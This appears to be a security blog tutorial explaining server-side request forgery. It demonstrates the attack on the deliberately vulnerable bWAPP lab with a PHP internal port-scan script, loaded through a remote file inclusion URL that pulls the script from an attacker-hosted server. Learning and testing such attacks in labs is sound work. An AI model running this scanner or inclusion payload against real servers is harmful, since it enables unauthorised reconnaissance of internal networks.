i Server Site Request Forgery (SSRF) – All things in moderation

Server Site Request Forgery (SSRF)

Introduction

Server Side Request Forgery attacks (SSRF) is a vulnerability that allow an attacker can force a vulnerable server to trigger malicious requests to internal resource or third-party servers. If the server behind the firewall that are normally inaccessible from the outside world, we can’t run port scans, but with SSRF it’s possible to bypass firewall access controls and to do port scans on the devices behind the firewall.

SSRF basic
The idea is to find victim server interfaces that will allow sending packets initiated by the victim server to the localhost interface of the victim server or to another server secured by a firewall from outside. Ideally, this interface must allow us to send any packet to any host and any port. And this interface must be accessed remotely without authentication or at least with minimum rights. So it’s work as follows:

– We send Packet A to Service A

– Service A sends Packet B to service B

– Services can be on same or different hosts

– We can manipulate some fields of packet B within packet A

– Different SSRF attacks depend on how many fields we can control on packet B

Using Server Side Request Forgery attacks it’s possible to:

– Scan and attack systems from the internal network that are not normally accessible.

– Enumerate and attack services that are running on these hosts.

– Exploit host-based authentication services.

Some common vulnerabilities related to server-side request forgery:

– URL redirection

– Remote file inclusion

– SQL injection

– Frame injection

– Link injection

– XML external entity

Exploit port scan host on the internal network using RFI

To demonstrate this attack I will be using module SSRF of the bWAPP Framework as shown below:

1. Check for Remote file inclusion (LFI) vulnerable

You must to select Remote & Local File Inclusion (RFI/LFI) rlfi.php page. Then click button go.

After submitting the request on the page, we notice a parameter language=lang_en.php in the GET URL. This looks as a perfect place to try for RFI.

Now we check for Remote File Inclusion(LFI) vulnerable by replace language=lang_en.php to language=http://www.google.com.

2. Exploit Server Site Request Forgery (SSRF)

Following is the remote malicious code that make this attack port scanning

<?php
if (isset($_GET["ip"])) {
    $ports = array(21, 22, 23, 25, 53, 80, 443, 3306);
    foreach ($ports as $port) {
        $service = getservbyport($port, "tcp");
        if($pf = @fsockopen($_GET["ip"], $port, $err, $err_string, 1)) {
            echo "Port $port($service)" . ": <span style='color:green'>Open</span><br>";
            fclose($pf);
        }
        else {
            echo "Port $port($service)" . ": <span style='color:red'>Inaccessible</span><br>";
        }

    }
}

?>

Let’s attack port scans on the internal network using RFI

http://192.168.28.129/bWAPP/rlfi.php?language=http://192.168.28.1:8888/ssrf_port_scan.txt&ip=192.168.28.129&action=go

192.168.28.129 is a is victim address

Sample output:

References

SSRF bible. Cheatsheet

Black hat presentation on SSRF

Leave a Reply